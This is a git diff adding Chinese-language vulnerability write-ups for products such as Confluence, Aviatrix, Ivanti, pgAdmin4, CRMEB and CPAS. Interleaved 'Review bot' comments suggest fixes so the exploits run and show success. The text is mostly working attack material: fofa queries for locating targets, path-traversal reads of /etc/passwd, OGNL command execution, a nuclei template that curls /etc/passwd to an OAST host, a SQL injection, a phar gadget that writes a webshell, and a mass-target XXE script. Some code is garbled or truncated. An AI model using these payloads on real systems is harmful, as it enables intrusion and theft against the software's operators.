@@ -0,0 +1,23 @@ +## Array VPN任意文件读取漏洞 + +## fofa +``` +product="Array-VPN" +``` + + +## poc +``` +GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1 +Host: ip:port +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd +Dnt: 1 +Upgrade-Insecure-Requests: 1 +Connection: close + +``` +![image](https://github.com/wy876/POC/assets/139549762/a6915f3f-2242-4d1d-b3a3-9ff452439cbc) diff --git a/ArrayVPN存在任意文件读取漏洞.md b/ArrayVPN存在任意文件读取漏洞.md new file mode 100644 index 0000000..5bbc0d1 --- /dev/null +++ b/ArrayVPN存在任意文件读取漏洞.md 
@@ -0,0 +1,36 @@ +# Array VPN存在任意文件读取漏洞 + +# 一、漏洞简介 +Array SSL VPN远程安全接入软件具备远程安全接入网关的全部功能,可以在虚拟化或云环境中提供专业的远程安全访问;它帮助用户实现在任何时间任何地点使用任何设备都可以安全地连接到云上的主机或应用。Array的 fshare_template 接口存在任意文件读取漏洞 + +# 二、影响版本 ++ Array VPN + +# 三、资产测绘 ++ fofa`product="Array-VPN"` ++ 特征 + +![1725779477080-0973a873-2c5d-4d34-a754-45b9db9c8553.png](./img/A05OLfyJgWII4Te6/1725779477080-0973a873-2c5d-4d34-a754-45b9db9c8553-671397.png) + +# 四、漏洞复现 +```java +GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd +Dnt: 1 +Upgrade-Insecure-Requests: 1 +Connection: close +``` + +![1725779502203-97c419b2-7ba4-4ac3-b00d-d3586b64031e.png](./img/A05OLfyJgWII4Te6/1725779502203-97c419b2-7ba4-4ac3-b00d-d3586b64031e-922332.png) + +![1725779512607-983887f4-4a8a-4777-a2f4-359819387b3b.png](./img/A05OLfyJgWII4Te6/1725779512607-983887f4-4a8a-4777-a2f4-359819387b3b-741809.png) + + + +> 更新: 2024-10-22 09:40:55 +> 原文: \ No newline at end of file diff --git a/ArrisTR3300路由器basic_sett存在未授权信息泄露漏洞.md b/ArrisTR3300路由器basic_sett存在未授权信息泄露漏洞.md new file mode 100644 index 0000000..fb0972c --- /dev/null +++ b/ArrisTR3300路由器basic_sett存在未授权信息泄露漏洞.md 
@@ -0,0 +1,33 @@ +# Arris TR3300路由器basic_sett存在未授权信息泄露漏洞 + +# 一、漏洞简介 +Arris TR3300路由器basic_sett存在未授权信息泄露漏洞 + +# 二、影响版本 ++ Arris路由器 + +# 三、资产测绘 ++ fofa`body="base64encode(document.tF.pws.value)" || body="ARRIS TR3300"` ++ 特征 + +![1716312584374-f0336037-460d-4dea-906c-64bdfc4f4c2e.png](./img/teksQfdjF22G8qcp/1716312584374-f0336037-460d-4dea-906c-64bdfc4f4c2e-875869.png) + +# 四、漏洞复现 +```plain +/basic_sett.html +``` + +密码泄露: + +![1716312848098-bd944f8e-fbeb-4124-8091-eef498dbb93f.png](./img/teksQfdjF22G8qcp/1716312848098-bd944f8e-fbeb-4124-8091-eef498dbb93f-941455.png) + +base64解密后登录系统 + +![1716312869564-ba0d97cd-cf30-427f-a3f2-43bed255913d.png](./img/teksQfdjF22G8qcp/1716312869564-ba0d97cd-cf30-427f-a3f2-43bed255913d-659160.png) + +![1716312948463-4d0f810a-8bc3-4ae0-983f-1a7ba7a195d3.png](./img/teksQfdjF22G8qcp/1716312948463-4d0f810a-8bc3-4ae0-983f-1a7ba7a195d3-124062.png) + + + +> 更新: 2024-05-23 13:30:54 +> 原文: \ No newline at end of file diff --git a/Atlassian-Confluence-远程代码执行漏洞(CVE-2023-22527).md b/Atlassian-Confluence-远程代码执行漏洞(CVE-2023-22527).md new file mode 100644 index 0000000..9c78561 --- /dev/null +++ b/Atlassian-Confluence-远程代码执行漏洞(CVE-2023-22527).md 
@@ -0,0 +1,97 @@ +## Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527) + +在Confluence 8.0到8.5.3版本之间,存在一处由于任意velocity模板被调用导致的OGNL表达式注入漏洞,未授权攻击者利用该漏洞可以直接攻击Confluence服务器并执行任意命令。 + +## poc +``` +POST /template/aui/text-inline.vm HTTP/1.1 +Host: localhost:8090 +Accept-Encoding: gzip, deflate, br +Accept: / +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Content-Type: application/x-www-form-urlencoded +Content-Length: 34 + +label=test\u0027%2b#{3*33}%2b\u0027 +``` + +## exp +``` +POST /template/aui/text-inline.vm HTTP/1.1 +Host: localhost:8090 +Accept-Encoding: gzip, deflate, br +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Content-Type: application/x-www-form-urlencoded +Content-Length: 285 + +label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})) +``` + +回显在body exp +``` +label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter.write((new+freemarker.template.utility.Execute()).exec({"id"})) + +``` +![image](https://github.com/wy876/POC/assets/139549762/60ed0618-c378-49c4-bbdc-c7c8067cb461) + +## nuclei +``` +id: CVE-2023-22527 + +info: + name: Atlassian Confluence - Remote Code Execution + author: iamnooob,rootxharsh,pdresearch + severity: critical + description: | + A template injection vulnerability on older versions of Confluence Data Center and 
Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. + Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin. + reference: + - https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615 + - https://jira.atlassian.com/browse/CONFSERVER-93833 + - https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2023-22527 + epss-score: 0.00044 + epss-percentile: 0.08115 + cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: atlassian + product: confluence_data_center + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2023,confluence,rce,ssti + +http: + - raw: + - |+ + POST /template/aui/text-inline.vm HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate, br + Content-Type: application/x-www-form-urlencoded + + label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=(new freemarker.template.utility.Execute()).exec({"curl {{interactsh-url}}"}) + + matchers-condition: and + matchers: + - type: word + words: + - 'Empty{name=' + + - type: word + part: interactsh_protocol + words: + - dns +``` +## 漏洞来源 +- https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html +- https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/ +- 
https://github.com/vulhub/vulhub/blob/master/confluence/CVE-2023-22527/README.zh-cn.md diff --git a/Aviatrix未授权远程代码执行漏洞(CVE-2024-50603).md b/Aviatrix未授权远程代码执行漏洞(CVE-2024-50603).md new file mode 100644 index 0000000..c339d18 --- /dev/null +++ b/Aviatrix未授权远程代码执行漏洞(CVE-2024-50603).md 
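Review bot: In Atlassian-Confluence-远程代码执行漏洞(CVE-2023-22527).md the "回显在body" variant calls `getResponse().getWriter.write(...)` without parentheses; OGNL parses `getWriter` there as a property name rather than a method call, so it should be `getWriter().write(...)`, matching the `getResponse().setHeader(...)` form used in the header variant. The first poc's `Accept: /` header lost its asterisks (`*/*`) in rendering. Neither the poc nor the exp says what a positive response looks like; the nuclei template further down matches on `Empty{name=` in the body, so state that marker (and, for the header variant, the `X-Cmd-Response` header) for the manual requests as well, otherwise a 200 with the template rendered unchanged is indistinguishable from success.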
@@ -0,0 +1,81 @@ +# Aviatrix未授权远程代码执行漏洞(CVE-2024-50603) + +在 7.1.4191 之前的 Aviatrix Controller 和 7.2.4996 之前的 7.2.x 中发现了问题。由于操作系统命令中使用的特殊元素的中和不当,未经身份验证的攻击者能够执行任意代码。 Shell 元字符可以发送到 cloud_type 中的 /v1/api(对于 list_flightpath_destination_instances),或者发送到 src_cloud_type(对于 Flightpath_connection_test)。 + +## zoomeye + +```javascript +app="Aviatrix Controller" +``` + +## poc + +```yaml +id: CVE-2024-50603 + +info: + name: Aviatrix Controller - Remote Code Execution + author: newlinesec,securing.pl + severity: critical + description: | + An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test. + reference: + - https://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-50603 + - https://docs.aviatrix.com/documentation/latest/network-security/index.html + - https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllers + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-50603 + cwe-id: CWE-78 + epss-score: 0.00046 + epss-percentile: 0.1845 + metadata: + verified: true + max-request: 1 + vendor: aviatrix + product: controller + shodan-query: + - http.title:"aviatrix controller" + - http.title:"aviatrix cloud controller" + fofa-query: + - app="aviatrix-controller" + - title="aviatrix cloud controller" + google-query: intitle:"aviatrix cloud controller" + zoomeye-query: app="Aviatrix Controller" + tags: cve,cve2024,aviatrix,controller,rce,oast + +variables: + oast: "{{interactsh-url}}" + +http: + - 
raw: + - | + POST /v1/api HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+{{oast}}) + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" + + - type: status + status: + - 200 + + - type: regex + part: interactsh_request + regex: + - 'root:.*:0:0:' +``` + + + +## 漏洞来源 + +- https://github.com/projectdiscovery/nuclei-templates/pull/11460/files \ No newline at end of file diff --git a/C-Lodop打印服务系统存在任意文件读取漏洞.md b/C-Lodop打印服务系统存在任意文件读取漏洞.md new file mode 100644 index 0000000..dec0aee --- /dev/null +++ b/C-Lodop打印服务系统存在任意文件读取漏洞.md @@ -0,0 +1,27 @@ +# C-Lodop打印服务系统存在任意文件读取漏洞 + +# 一、漏洞简介 +C-Lodop云打印服务器是一款非常好用且受欢迎的专业云打印软件,简单实用,易操作。攻击者可利用此漏洞获取服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。 + +# 二、影响版本 ++ C-Lodop打印服务系统 + +# 三、资产测绘 ++ fofa`"C-Lodop" && icon_hash="-329747115"` ++ 特征 + +![1708149014735-a271087e-43e2-4581-b58f-bf1ea1c76ccb.png](./img/nMpcvRKOmZw8jtUJ/1708149014735-a271087e-43e2-4581-b58f-bf1ea1c76ccb-469585.png) + +# 四、漏洞复现 +```plain +GET /..././..././..././..././Windows/System32/drivers/etc/hosts HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +``` + +![1708149061920-15696431-0199-4458-b957-771df9fb1277.png](./img/nMpcvRKOmZw8jtUJ/1708149061920-15696431-0199-4458-b957-771df9fb1277-034670.png) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: \ No newline at end of file diff --git a/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md b/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md new file mode 100644 index 0000000..de5ea79 --- /dev/null +++ b/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md 
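Review bot: In Aviatrix未授权远程代码执行漏洞(CVE-2024-50603).md the raw request body of the nuclei template reads `account_name=1®ion=1&vpc_id_name=1`; the `&region` parameter has been turned into the `®` character by entity decoding, so the template as pasted sends a malformed body and the injected `cloud_type` value never reaches `list_flightpath_destination_instances`. Restore `&region=1`. The raw block also appears to lack the empty line between `Content-Type: ...` and `action=...` that separates headers from body (the Confluence template on this page keeps it). Finally, say in the text that the proof of execution is the OAST callback carrying `/etc/passwd` (the `root:.*:0:0:` regex on `interactsh_request`), not the `status: 200`, which the endpoint may return regardless.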
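Review bot: In C-Lodop打印服务系统存在任意文件读取漏洞.md the request line `GET /..././..././..././..././Windows/System32/drivers/etc/hosts` uses the `..././` form, which only resolves to `..\..\..\..\` when the server strips a single `../` from each segment before building the path; say so, because a reader who tries plain `../../` first will wrongly conclude the target is patched. The `Host:` header is empty and the request has no terminating blank line. The 漏洞简介 promises database credentials and API keys, but the PoC only reads the `hosts` file; either show a file that supports that claim or reduce the impact statement to what is demonstrated.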
@@ -0,0 +1,24 @@ +# CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞 + +友数聚 CPAS审计管理系统V4 getCurserIfAllowLogin 接口存在SQL注入,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa +```javascript +body="/cpasm4/static/cap/font/iconfont.css" +``` + +## poc +```javascript +POST /cpasm4/cpasList/getCurserIfAllowLogin HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip, deflate +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: text/plain, */*; q=0.01 + +ygbh=q' AND (SELECT 1635 FROM (SELECT(SLEEP(5)))mlQT) AND 'qoYJ'='qoYJ +``` + +![image-20241227215623148](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272156212.png) \ No newline at end of file diff --git a/CPAS审计管理系统存在任意文件读取漏洞.md b/CPAS审计管理系统存在任意文件读取漏洞.md new file mode 100644 index 0000000..9ff0dd8 --- /dev/null +++ b/CPAS审计管理系统存在任意文件读取漏洞.md @@ -0,0 +1,22 @@ +# CPAS审计管理系统存在任意文件读取漏洞 + +CPAS审计管理系统存在任意文件读取漏洞 + +## fofa + +```javascript +icon_hash="-58141038" +``` + +## poc + +```javascript +GET /cpasm4/plugInManController/downPlugs?fileId=../../../../etc/passwd&fileName= HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +``` + diff --git a/CRMEB任意文件下载漏洞分析(CVE-2024-52726).md b/CRMEB任意文件下载漏洞分析(CVE-2024-52726).md new file mode 100644 index 0000000..9bc0b5e --- /dev/null +++ b/CRMEB任意文件下载漏洞分析(CVE-2024-52726).md 
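Review bot: In CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md the payload `ygbh=q' AND (SELECT 1635 FROM (SELECT(SLEEP(5)))mlQT) AND 'qoYJ'='qoYJ` is a time-based blind probe taken from sqlmap output, but the text gives no baseline: state that the check is a delay of roughly 5 s compared with the same request using `SLEEP(0)` or no injected clause, otherwise a slow target yields a false positive. The `Host:` header is empty. The claim that the attacker can "向服务器中写入木马" depends on database privileges and server configuration the write-up does not establish; phrase it as a possibility under high privileges rather than as a consequence of the injection itself, and show the response timing in the screenshot caption so the evidence is visible.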
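Review bot: In CPAS审计管理系统存在任意文件读取漏洞.md the description is a copy of the title and names neither endpoint nor parameter; state that `plugInManController/downPlugs` passes `fileId` to a file read without normalisation, and say what `fileName=` does, since the PoC leaves it empty (required, or only the download name?). The fofa query here (`icon_hash="-58141038"`) differs from the `body="/cpasm4/static/cap/font/iconfont.css"` used for the same product in the preceding file; if both are valid fingerprints say so, otherwise use one. No expected response is given; `/etc/passwd` content in the body should be named as the success indicator.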
@@ -0,0 +1,35 @@ +## CRMEB任意文件下载漏洞分析(CVE-2024-52726) + +app/adminapi/controller/v1/setting/SystemConfig.php路由中存在任意文件下载漏洞 + +## fofa + +```javascript +icon_hash="-847565074" +``` + +## poc + +```javascript +POST /adminapi/setting/config/save_basics HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Authori-zation: +Cookie: cb_lang=zh-cn; +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Priority: u=0, i +Content-Type: application/json;charset=utf-8 +Content-Length: 72 + +{ + "weixin_ckeck_file": "../../../../../../../../Windows/win.ini" +} +``` + diff --git a/CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944).md b/CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944).md new file mode 100644 index 0000000..bc91aee --- /dev/null +++ b/CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944).md 
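Review bot: In CRMEB任意文件下载漏洞分析(CVE-2024-52726).md the request targets `/adminapi/setting/config/save_basics` with an empty `Authori-zation:` header, yet the text never states that a valid admin token is required; say so explicitly, because it moves the finding from unauthenticated to post-auth arbitrary file read. The opening line names `SystemConfig.php` but not the method or how the `weixin_ckeck_file` value reaches a file read, so the "分析" promised in the title is not delivered; add a short trace or drop the word. The expected response (the contents of `win.ini`) should be stated as the success criterion.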
@@ -0,0 +1,87 @@ +# CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944) + +钟邦科技CRMEB 5.4.0版本中发现一个关键漏洞。受影响的是PublicController.php文件中的get_image_base64函数。参数文件的操作会导致反序列化。攻击可能远程发起。该漏洞已被公开披露并可能被利用。 + +## fofa + +```javascript +icon_hash="-847565074" +``` + +## 漏洞复现 + +生成phar文件并gzip压缩 + +```php +data['Expires'] = ''; + $this->data['Discard'] = 0; + } + } + + class CookieJar{ + private $cookies = []; + private $strictMode; + function __construct() { + $this->cookies[] = new SetCookie(); + } + } + + class FileCookieJar extends CookieJar { + private $filename; + private $storeSessionCookies; + function __construct() { + parent::__construct(); + $this->filename = "D:/phpstudy/WWW/crmeb/public/shell.php"; + $this->storeSessionCookies = true; + } + } +} + +namespace{ + $exp = new GuzzleHttp\Cookie\FileCookieJar(); + + $phar = new Phar('test.phar'); + $phar -> stopBuffering(); + $phar->setStub("GIF89a".""); + $phar -> addFromString('test.txt','test'); + $phar -> setMetadata($exp); + $phar -> stopBuffering(); + rename('test.phar','test.jpg'); +} + +?> +``` + +gzip压缩文件 + +```php +gzip test.jpg +``` + +注册用户上传头像 + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250941110.png) + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250941888.png) + +触发phar反序列化 + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250942476.png) + +成功写入 + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250942596.png) + + + +## 漏洞来源 + +- https://forum.butian.net/article/610 \ No newline at end of file diff --git a/CVE-2024-2044.md b/CVE-2024-2044.md new file mode 100644 index 0000000..525751d --- /dev/null +++ b/CVE-2024-2044.md 
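Review bot: In CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944).md the phar generator is truncated: it begins at `data['Expires'] = '';` inside a class body, so the `<?php` tag, the `namespace GuzzleHttp\Cookie {` block and the `SetCookie` class header with its `$data` property are missing, and `setStub("GIF89a"."")` has lost the `__HALT_COMPILER(); ?>` stub a phar needs (angle-bracket text was evidently stripped on extraction). The script also calls `$phar -> stopBuffering();` twice; the first call is presumably meant to be `startBuffering()`. As pasted it neither parses nor produces a phar, so the `gzip test.jpg` step and the upload that follows cannot be reproduced. The absolute path `D:/phpstudy/WWW/crmeb/public/shell.php` is the author's lab path and should be called out as something to adjust, and the text should say which request triggers the `phar://` read of the uploaded avatar.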
@@ -0,0 +1,133 @@ +# pgAdmin4存在反序列化漏洞(CVE-2024-2044) + +pgAdmin4存在反序列化漏洞,当pgAdmin4运行在Window平台时攻击者可在无需登陆的情况下构造恶意请求造成远程代码执行。若pgAdmin4运行在Unix平台时,需要先经过身份认证才可触发反序列化造成代码执行。 + +## fofa + +```javascript +icon_hash="1502815117" +``` + +## poc + +```python +#!/usr/bin/env python +# Impacket - Collection of Python classes for working with network protocols. +# +# Copyright (C) 2023 Fortra. All rights reserved. +# +# This software is provided under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Description: +# Simple SMB Server example. +# +# Author: +# Alberto Solino (@agsolino) +# + +import sys +import argparse +import logging + +from impacket.examples import logger +from impacket import smbserver, version +from impacket.ntlm import compute_lmhash, compute_nthash + +if __name__ == '__main__': + + # Init the example's logger theme + print(version.BANNER) + + parser = argparse.ArgumentParser(add_help = True, description = "This script will launch a SMB Server and add a " + "share specified as an argument. You need to be root in order to bind to port 445. " + "For optional authentication, it is possible to specify username and password or the NTLM hash. 
" + "Example: smbserver.py -comment 'My share' TMP /tmp") + + parser.add_argument('shareName', action='store', help='name of the share to add') + parser.add_argument('sharePath', action='store', help='path of the share to add') + parser.add_argument('-comment', action='store', help='share\'s comment to display when asked for shares') + parser.add_argument('-username', action="store", help='Username to authenticate clients') + parser.add_argument('-password', action="store", help='Password for the Username') + parser.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes for the Username, format is LMHASH:NTHASH') + parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output') + parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') + parser.add_argument('-ip', '--interface-address', action='store', default='0.0.0.0', help='ip address of listening interface') + parser.add_argument('-port', action='store', default='445', help='TCP port for listening incoming connections (default 445)') + parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)') + + if len(sys.argv)==1: + parser.print_help() + sys.exit(1) + + try: + options = parser.parse_args() + except Exception as e: + logging.critical(str(e)) + sys.exit(1) + + logger.init(options.ts) + + if options.debug is True: + logging.getLogger().setLevel(logging.DEBUG) + # Print the Library's installation path + logging.debug(version.getInstallationPath()) + else: + logging.getLogger().setLevel(logging.INFO) + + if options.comment is None: + comment = '' + else: + comment = options.comment + + server = smbserver.SimpleSMBServer(listenAddress=options.interface_address, listenPort=int(options.port)) + + server.addShare(options.shareName.upper(), options.sharePath, comment) + server.setSMB2Support(options.smb2support) + + # If a user was specified, let's add it to the credentials for the 
SMBServer. If no user is specified, anonymous + # connections will be allowed + if options.username is not None: + # we either need a password or hashes, if not, ask + if options.password is None and options.hashes is None: + from getpass import getpass + password = getpass("Password:") + # Let's convert to hashes + lmhash = compute_lmhash(password) + nthash = compute_nthash(password) + elif options.password is not None: + lmhash = compute_lmhash(options.password) + nthash = compute_nthash(options.password) + else: + lmhash, nthash = options.hashes.split(':') + + server.addCredential(options.username, 0, lmhash, nthash) + + # Here you can set a custom SMB challenge in hex format + # If empty defaults to '4141414141414141' + # (remember: must be 16 hex bytes long) + # e.g. server.setSMBChallenge('12345678abcdef00') + server.setSMBChallenge('') + + # If you don't want log to stdout, comment the following line + # If you want log dumped to a file, enter the filename + server.setLogFile('') + + # Rock and roll + server.start() +``` + +将 /tmp 文件夹公开为共享 : `python3 smbserver.py -smb2support share /tmp` + + + +## 漏洞来源 + +- https://github.com/lal0ne/vulnerability/tree/main/pgadmin4/CVE-2024-2044 +- https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/ + + + + + diff --git a/CVE-2024-22024.md b/CVE-2024-22024.md new file mode 100644 index 0000000..c7849d3 --- /dev/null +++ b/CVE-2024-22024.md 
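Review bot: In CVE-2024-2044.md the block headed "poc" is impacket's unmodified `smbserver.py` example; it is only the attacker-side SMB share and contains nothing pgAdmin-specific: no request to pgAdmin, no indication of which endpoint or parameter takes the path that is traversed to the UNC share, and no serialized payload to place in `/tmp`. As it stands the heading is misleading; either add the triggering request and the file to drop on the share, or retitle the section as the SMB share setup and point to the shielder advisory under 漏洞来源 for the actual chain. The impacket licence header and argparse boilerplate could be trimmed to the `addShare`/`setSMB2Support`/`start()` lines the reader needs, with the single command line `python3 smbserver.py -smb2support share /tmp` kept.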
@@ -0,0 +1,102 @@ +# Ivanti Pulse Connect Secure VPN存在XXE漏洞(CVE-2024-22024) + +Ivanti Pulse Connect Secure VPN存在XXE漏洞,攻击者可构造恶意请求触发XXE,结合相关功能造成远程代码执行。 + +## 影响范围 + +- ivanti connect_secure 22.4 +- ivanti connect_secure 22.5 +- ivanti connect_secure 9.1 +- ivanti policy_secure 22.5 +- ivanti zero_trust_access 22.6 + +## poc + +```python +import base64 +import requests +import argparse +from pathlib import Path +import urllib3 +from urllib3.exceptions import InsecureRequestWarning + +# Suppress only the single InsecureRequestWarning from urllib3 +urllib3.disable_warnings(InsecureRequestWarning) + +''' + PoC by Abdulla + CVE-2024-22024 (XXE) for Ivanti Connect Secure and Ivanti Policy Secure + Remediation: + https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US +''' + +def send_request(target_url, attacker_url, timeout): + xml_payload_template = """ %xxe;]>""" + xml_payload = xml_payload_template.format(attacker_url + "/test") # Format with the provided external URL + encoded_payload = base64.b64encode(xml_payload.encode()).decode() # Encode in base64 + data = {'SAMLRequest': encoded_payload} # Data for POST request + + # Attempt the POST request with the specified timeout + try: + response = requests.post(target_url+"/dana-na/auth/saml-sso.cgi", data=data, verify=False, timeout=timeout) + print(f"Response from {target_url}: {response.status_code}") + except requests.exceptions.Timeout: + print(f"Request to {target_url} timed out.") + except Exception as e: + print(f"Error sending request to {target_url}.") + +def main(target_urls, attacker_url, timeout): + if Path(target_urls).is_file(): # If target_urls is a file path + with open(target_urls, 'r') as file: + urls = file.read().splitlines() + for url in urls: + send_request(url, attacker_url, timeout) + else: # Assume target_urls is a single URL + send_request(target_urls, attacker_url, timeout) + +if __name__ == "__main__": + parser = 
argparse.ArgumentParser(description="Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure by Abdulla.") + parser.add_argument("-u", "--target_url", required=True, help="The target URL or file with URLs where the SAML request should be sent") + parser.add_argument("-c", "--attacker_url", required=True, help="The attacker URL to include in the XXE payload") + parser.add_argument("-t", "--timeout", type=int, default=3, help="Timeout in seconds for the request (default is 3 seconds)") + args = parser.parse_args() + + main(args.target_url, args.attacker_url, args.timeout) + +``` + +### Parameters + + + +- `-u` or `--target_url`: The target Ivanti Connect Secure (ICS) URL or file with list of URLs. +- `-c` or `--attacker_url`: The attacker URL (generate one using Burp Collaborator, ngrok, or by using a unique URL from [Webhook.site](https://webhook.site/)) +- `-t` or `--timeout`: Timeout in seconds for the request (default is 3 seconds) + +### How to use + + + +Testing a single URL: + +``` +python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com +``` + +Testing list of URLs: + +``` +python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com +``` + +Using a different timeout (5 seconds): + +``` +python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5 +``` + + + +## 漏洞来源 + +- https://github.com/lal0ne/vulnerability/tree/main/Ivanti/CVE-2024-22024 \ No newline at end of file diff --git a/CVE-2024-2561.md b/CVE-2024-2561.md new file 